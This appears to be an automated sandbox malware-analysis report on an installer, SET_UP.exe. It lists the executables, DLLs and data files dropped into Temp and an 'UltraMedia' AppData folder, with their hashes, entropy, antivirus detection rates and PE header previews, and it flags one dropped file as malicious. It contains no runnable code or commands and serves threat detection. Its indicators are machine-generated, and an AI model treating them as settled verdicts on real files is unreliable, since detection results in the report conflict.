                                                                                                                          #U5b89#U88c5#U7a0b#U5e8f_2.1.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            yvaKqhmD4L.exeGet hashmaliciousUnknownBrowse
                                                                                                                              yvaKqhmD4L.exeGet hashmaliciousUnknownBrowse
                                                                                                                                #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exeGet hashmaliciousUnknownBrowse

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):8371434
                                                                                                                                          Entropy (8bit):7.957206291621346
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:196608:ZBi8NN9RmN2Psr6jaPVLOTCDIdtBXJNDi+:ZQ8NN9LFjaPVa+UXJv
                                                                                                                                          MD5:2A2989ED741C431F4A3276264F7BDB61
                                                                                                                                          SHA1:F73D27C971D440346BBC18358FFD1A860F08180F
                                                                                                                                          SHA-256:8EF59A69E6CE81623CF61EB466321DDB66A978A7F9A808947BE9AC8FE869550F
                                                                                                                                          SHA-512:A2C53D6785FC543DC9A72EB29FF0C9DA88DF0EBF705A5DA9BBDF444A969C233176A540B67396840E59A48E846CEFA6DB1237C87CC5139D94E68718D09BE85EEC
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.................................+1a...@......@...................p..q....P..........................P............................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-8TLP5.tmp\_isetup\_setup64.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6144
                                                                                                                                          Entropy (8bit):4.720366600008286
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: GLD6WIS3RXG4KKYJLK.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_2.1.0.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_2.1.0.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: yvaKqhmD4L.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: yvaKqhmD4L.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3367424
                                                                                                                                          Entropy (8bit):6.53001282597034
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                          MD5:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                          SHA1:67DB71F5A885B1E417B1272218E6B814C45A6C93
                                                                                                                                          SHA-256:E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
                                                                                                                                          SHA-512:AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3367424
                                                                                                                                          Entropy (8bit):6.53001282597034
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                          MD5:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                          SHA1:67DB71F5A885B1E417B1272218E6B814C45A6C93
                                                                                                                                          SHA-256:E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
                                                                                                                                          SHA-512:AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-N3BQO.tmp\_isetup\_setup64.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6144
                                                                                                                                          Entropy (8bit):4.720366600008286
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):167432
                                                                                                                                          Entropy (8bit):6.360991599728718
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:yK2FRsfrS8Ywp3GKJ7hDD/vRvDTX8QlevsqYau7j7/EecxurY:x1TSG/XT5Fau7pXk
                                                                                                                                          MD5:0588CE0C39DA3283E779C1D5B21D283B
                                                                                                                                          SHA1:1F264A47972D63DB2CDE18DC8311BC46551380EB
                                                                                                                                          SHA-256:D5A6714AB95CAA92EF1A712465A44C1827122B971BDB28FFA33221E07651D6F7
                                                                                                                                          SHA-512:A5F97AC156D081CB4D9B3F32948EEA387725C88AF0F19E8BC8DB2058A19E211648B7FD86708FF5E1DB8F7B57CA3AB8EDEBA771C9D684C53BCB228CA71ADAB02A
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....(e.....................f....................@..................................5...........@..............................0b...................B...L..............................................................8............................text...4........................... ..`.itext..4........................... ..`.data...............................@....bss.....................................idata..0b.......d..................@....reloc...............B..............@..B.rsrc................T..............@..@....................................@..@................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\chamberpot.mov (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):57648
                                                                                                                                          Entropy (8bit):4.550992233527233
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:x2wABEZ6oIUJ/dJzXo6oB2FWNveOo6kzk1/+jjHC4jDXz6O5jE5BkkV1JDp0msak:EwABEZfID72OYzSuNjDj2BkkV3pgGyt
                                                                                                                                          MD5:C0CAF225931CFA74230FBD256997CF4C
                                                                                                                                          SHA1:7436A37776AE636208B3880BB4B1408ABB3A92BA
                                                                                                                                          SHA-256:B631E0F6F5C45F9F7680CF91136F2C79A533D18875CEDF5E2E968A168AD5422D
                                                                                                                                          SHA-512:42DFA23E076ECBF555B9EAC74C00DC89EB5EC600FEE192BA1BDE8215A6E7FD65B6C017ED3AD4375E714B18D6AE03FFE3A5732370658B8DA0F27E4E868168AE96
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:x.O.P..\...E.Q`N.H...]W.r..R..ajm....AVI.f.f..]]..oo..HMEE][.BT..G_..J.fs.GJ[M.....xZ.^..p..G_...TY.....N.jKM.V.b.SquofmV..[EZ[JJ..........l.dkBH.._..g....k..MlA....n.CsSi.f..t.f.A.x..B..B...igq..k.....E..Lr..^.....vd...Hj.L..x....\j.Gd..\Mk.RlJ.gdCo`c..W.xc.....[qF...F..L.H..Rqr.lp^.xMpPe.G...].DtY.kjs..krWTE.Eti.rF.].^..Oe...X.Y].xgot.K.T.S..ygj....[v`.]P.`Ns..L.^..Dx..d...jWS....P.R..mJ...`XbYhEnT..x....EK..LL.Sl.IEA.....JWIeJEen...c.g.\.w..]]E..BwsVdhm...k...U.......Wpo.c...N..oj....^.SsD]P......b..aDF..f`.fB.\......AN.lQ..Vy.Jl`ZWh.v...EvPC...P...PWn..B..`.EV.....N.R.\..S.F..Kj.b.rmp..i..`Mfl`k..R.ij.RAw.C..a.Y.Nrowx...U...YM..h.F.m.lJ....M.kC.f__y.LF.E........p.BlgKGD...kl..._.._d..ve..b.R.VL.d.[.t..n.MZ^..un.....K....V..H.[...qi..P..Oj...wdyR.Z.KN...Y..V..E..jA.Yi.bl.j...ktp.....HD.E.Ivv......n.uIChd.........CB...A....KA.....LB.UnlWek..j.iR.S......`D.Z...D..t.Q.VVoI..l...GZd..F^.ClV.B.U.f.h.IW.C..LVWJD.Iwy...g.Fo..krjK..ulpTnCX^.xb.lm.G.Bm.....]p[wxDG..nks.X..e.rdo..TceD........

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1114632
                                                                                                                                          Entropy (8bit):6.835959006752849
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:0bhz5FWbA1msvIRzM7Rk5JZzSQ4+Is2D9Tx0gbo9:b2hTKgbo9
                                                                                                                                          MD5:E71E48E31AC728A6DE7C020645F0C32F
                                                                                                                                          SHA1:7F86EADD1B7A0AB87B7CE7C2029BDEF3D6FE1D8D
                                                                                                                                          SHA-256:40A1D1A2F276738F568700DDCCAC99CDCD35B973FC8BE86AB826C0D1ABC9D6FF
                                                                                                                                          SHA-512:5E41DBE7EFAC8A042A14C2F976D1AFCD45E3F7531FB60DAAB61AC17FFD339D34E1C6746FCE9E4B591B026598A89E38F36C6D24E33E2DE0B39D81806259F9BE2A
                                                                                                                                          Malicious:false
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp, Author: Joe Security
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H...........................................P.........................`.................................................X$...p...................L..............................................................x............................text.............................. ..`.itext........... .................. ..`.data...tw.......x..................@....bss.... T...@.......(...................idata..X$.......&...(..............@....edata...............N..............@..@.rdata...............0..............@..@.reloc...............2..............@..B.rsrc........p......................@..@.............`......................@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\is-A3K5N.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6557262
                                                                                                                                          Entropy (8bit):7.976170515806142
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:hjt9oE685wwEVri3xKkTNU7O22do+wn/W2MFXxL8meovJoWl6R7RIoiaTqfNnObu:J3o5VQ5COXdodn/+XhvvJoHZOFZVaV0
                                                                                                                                          MD5:88E1EDD6CE0B044711CE803670E81C74
                                                                                                                                          SHA1:1F19D8EA4EDED28E92454C833BD284F6BCB5279B
                                                                                                                                          SHA-256:F7C7472065564F2C81168AB687FCBB59A3E8C8E16E826C3772911D17D86F8CB9
                                                                                                                                          SHA-512:A1D06669DA35BF6075E142A9BD0CBEF7435DA5CAA48921A48AE30D3C84C8D4CFF4C52851B1C8F3E3C40B1C41932E3A6F043632BBEB4667847EFF5675EF9B751A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..C...h.NL.o.MbR..FkCAO...c.q.AC.b...c.Zx..c...wn....y.M_XW....ah.g`..E...imvQ..ByhV^e.fR.G....n..U.ECN....T.fqX.smX.dl.WG..X.V.W.qn.......L.bEVn.jp..K.C....TmH.CUJ...AVe...d.M`..f.wh.D.S.HvO...Ra..f...Eq.k.b..O.V...dsgyI...eMCG..._v.W.A...ZLym.....Zk.hJN....Kux.D..hl..B.aQk...R.X..ml....ZMB.\Q.q...Dxf.k.X...D`.TLlMa..lc.ytP.TJF..K\SaE.K\WY.G....`.f.w..Ck..x..ij.g.y.f...Mplo.upssO.FVs....v.w..\Zr.]x..K..g.....K.H.XY.p...p.gV.F.H.M...^.anm..w.[n..Iu.jxj.JA.r...td..NU.r..nh.e..SSM^bGa.c[P..i.p.WgdXt.KF..Xt.vAAs..o.nO.U..E.ks.ii..l..x.L...jsVM.s.....q.B.p.D...^YG.RO...j..P...BJ.roZ.`j....tP.Q...UWt.S.M\.]A.pFJ.JB.a.u.G.WW..w[......r.hGwT.JHt..aYqS..l.C..M..O.R....i..Ad..Ui..TeDB^...tW...D.[..G\CD.ZWMQ][.yKVd...F._..jn.KIc..L...rho...xJ.[.....u..w..Q.VH.g.X^vg.iS_.IN.a.aU.q..Tq..N...M..A......e....\NS`Fk.....K.Wxs..K.TD..THm...Kc.r....b..Zg..b..jWD.g..I.bIU...j.....qHm.g.qyL.....A.IH.Lc.eOo.OSN.Tl..uL....q.\....e..CG.KmU...h.yo.xy.M.w.fc..]...G...\..Gqa.a.s.dP.V..g_...M_.g..QIh_.V.XLDxQa..

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\is-BPOT7.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):57648
                                                                                                                                          Entropy (8bit):4.550992233527233
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:x2wABEZ6oIUJ/dJzXo6oB2FWNveOo6kzk1/+jjHC4jDXz6O5jE5BkkV1JDp0msak:EwABEZfID72OYzSuNjDj2BkkV3pgGyt
                                                                                                                                          MD5:C0CAF225931CFA74230FBD256997CF4C
                                                                                                                                          SHA1:7436A37776AE636208B3880BB4B1408ABB3A92BA
                                                                                                                                          SHA-256:B631E0F6F5C45F9F7680CF91136F2C79A533D18875CEDF5E2E968A168AD5422D
                                                                                                                                          SHA-512:42DFA23E076ECBF555B9EAC74C00DC89EB5EC600FEE192BA1BDE8215A6E7FD65B6C017ED3AD4375E714B18D6AE03FFE3A5732370658B8DA0F27E4E868168AE96
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:x.O.P..\...E.Q`N.H...]W.r..R..ajm....AVI.f.f..]]..oo..HMEE][.BT..G_..J.fs.GJ[M.....xZ.^..p..G_...TY.....N.jKM.V.b.SquofmV..[EZ[JJ..........l.dkBH.._..g....k..MlA....n.CsSi.f..t.f.A.x..B..B...igq..k.....E..Lr..^.....vd...Hj.L..x....\j.Gd..\Mk.RlJ.gdCo`c..W.xc.....[qF...F..L.H..Rqr.lp^.xMpPe.G...].DtY.kjs..krWTE.Eti.rF.].^..Oe...X.Y].xgot.K.T.S..ygj....[v`.]P.`Ns..L.^..Dx..d...jWS....P.R..mJ...`XbYhEnT..x....EK..LL.Sl.IEA.....JWIeJEen...c.g.\.w..]]E..BwsVdhm...k...U.......Wpo.c...N..oj....^.SsD]P......b..aDF..f`.fB.\......AN.lQ..Vy.Jl`ZWh.v...EvPC...P...PWn..B..`.EV.....N.R.\..S.F..Kj.b.rmp..i..`Mfl`k..R.ij.RAw.C..a.Y.Nrowx...U...YM..h.F.m.lJ....M.kC.f__y.LF.E........p.BlgKGD...kl..._.._d..ve..b.R.VL.d.[.t..n.MZ^..un.....K....V..H.[...qi..P..Oj...wdyR.Z.KN...Y..V..E..jA.Yi.bl.j...ktp.....HD.E.Ivv......n.uIChd.........CB...A....KA.....LB.UnlWek..j.iR.S......`D.Z...D..t.Q.VVoI..l...GZd..F^.ClV.B.U.f.h.IW.C..LVWJD.Iwy...g.Fo..krjK..ulpTnCX^.xb.lm.G.Bm.....]p[wxDG..nks.X..e.rdo..TceD........

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\is-OKBGO.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2015240
                                                                                                                                          Entropy (8bit):6.681879780616523
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:v2gt8PRUMggrgN/5tWw+eNVEXZB5SOCwhuuYY8RPyS9YEPI5yz6W:vRSf0Ww+NpPSyzYY8c8YEPI4+W
                                                                                                                                          MD5:9A438A75E68E88CDABC13074A17F8A52
                                                                                                                                          SHA1:97C94801D37D249ECE7BA9ACA05703303FD9CF06
                                                                                                                                          SHA-256:CCCCADDE7393F1B624CDE32B38274E60BBE65B1769D614D129BABDAEEF9A6715
                                                                                                                                          SHA-512:19D260505972B96C2E5AE0058A29F61E606E276779A80732DBEE70F9223DBFF51DCB1F5E4EFF19206C300EE08E6060987171F5B83AD87FDD8F797E0E2DB529FC
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H.....................l............... .....P.................................8...............................P...'...`.......................t...L.......^.............."....................................y...............................text...4........................... ..`.itext.............................. ..`.data...\!... ..."..................@....bss....<....P.......*...................idata.......`.......*..............@....edata...'...P...(..................@..@.rdata.."............8..............@..@.reloc...^.......`...:..............@..B.rsrc...............................@..@.....................t..............@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\is-RBCNP.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):167432
                                                                                                                                          Entropy (8bit):6.360991599728718
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:yK2FRsfrS8Ywp3GKJ7hDD/vRvDTX8QlevsqYau7j7/EecxurY:x1TSG/XT5Fau7pXk
                                                                                                                                          MD5:0588CE0C39DA3283E779C1D5B21D283B
                                                                                                                                          SHA1:1F264A47972D63DB2CDE18DC8311BC46551380EB
                                                                                                                                          SHA-256:D5A6714AB95CAA92EF1A712465A44C1827122B971BDB28FFA33221E07651D6F7
                                                                                                                                          SHA-512:A5F97AC156D081CB4D9B3F32948EEA387725C88AF0F19E8BC8DB2058A19E211648B7FD86708FF5E1DB8F7B57CA3AB8EDEBA771C9D684C53BCB228CA71ADAB02A
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....(e.....................f....................@..................................5...........@..............................0b...................B...L..............................................................8............................text...4........................... ..`.itext..4........................... ..`.data...............................@....bss.....................................idata..0b.......d..................@....reloc...............B..............@..B.rsrc................T..............@..@....................................@..@................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\is-SQ6C4.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):66056
                                                                                                                                          Entropy (8bit):6.89541527402873
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:eNy3eqMne0sXB0IWtCLwEJhY0w1FwbiD7wlwei7:CqMnfIB04LwEJhY0w1UTnE
                                                                                                                                          MD5:11EFAB4068CB4058207959E2638C2C1A
                                                                                                                                          SHA1:B1EAC0879DCDA14BDC0C2EFD7F261D7C175208C3
                                                                                                                                          SHA-256:11E3568F497C40331EE4A9E9973967E61B224E19204E09ED7451DA3B74BD2FF5
                                                                                                                                          SHA-512:CED6167612674232429C25E52BA051994B09FDAEAF3316505904456EF8D7063F2EB03B5A158F0A424F0ECB49673E6A3D6B57D61183C5F8402DA3FE53AF0BD185
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...[..V.................z...8......4..............W......................... ......|>..................................&.......d........................L......T...............#....................................................................text...4w.......x.................. ..`.itext..<............|.............. ..`.data................~..............@....bss.....................................idata..d...........................@....edata..&...........................@..@.rdata..#...........................@..@.reloc..T...........................@..B.rsrc...............................@..@............. ......................@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\is-TBCRP.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):197632
                                                                                                                                          Entropy (8bit):6.7840768813314964
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:yN/kGQxE6qeM/k4qTl5L5e5+53WCG1CnTeFmf:VqeM/k4qR5L5e5+53WKiE
                                                                                                                                          MD5:09C311CE669A6BBD40B4D27FBB6F249E
                                                                                                                                          SHA1:7714EB60EFE0C0ACE52681B11AC4EE80488BB796
                                                                                                                                          SHA-256:AD9B4441C680A9691259668A0685429CBFDA55D4C19DB8230C52283EEB752743
                                                                                                                                          SHA-512:19825B164A64754778C2A83463164BD533B68A77CA62CB271074E92D7ED759657CDC12187EC1DBEF700143765FE74ADCABAB5D1BCE5C3211B470246689DFF73A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...[..V.............................0.......@.....W.................................................................0...d......`(......x.......................................".......................................0............................text...x........................... ..`.itext.......0...................... ..`.data...l&...@...(..................@....bss........p.......@...................idata..`(.......*...@..............@....edata...d...0...f...j..............@..@.rdata.."...........................@..@.reloc..............................@..B.rsrc...x...........................@..@....................................@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\UltraMedia\is-UIAB4.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):448520
                                                                                                                                          Entropy (8bit):6.746694731944354
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:XlAz49EKhEV30F8sl88nTjQ4Q50gEcW/jd+o72niVUNMa4Yn2lZ:XlG4ut30F8slzYlQcW/jd++2nJ6u2lZ
                                                                                                                                          MD5:562EC96D0F65B0309AD7508D0E0CED11
                                                                                                                                          SHA1:0FE9DDA664F4F8D9AE18603C5A25756710032A6F
                                                                                                                                          SHA-256:FB64A5954B726D2D0F0BC26113A36DC8A86C469AF994CEEAF2E2609743A0A557
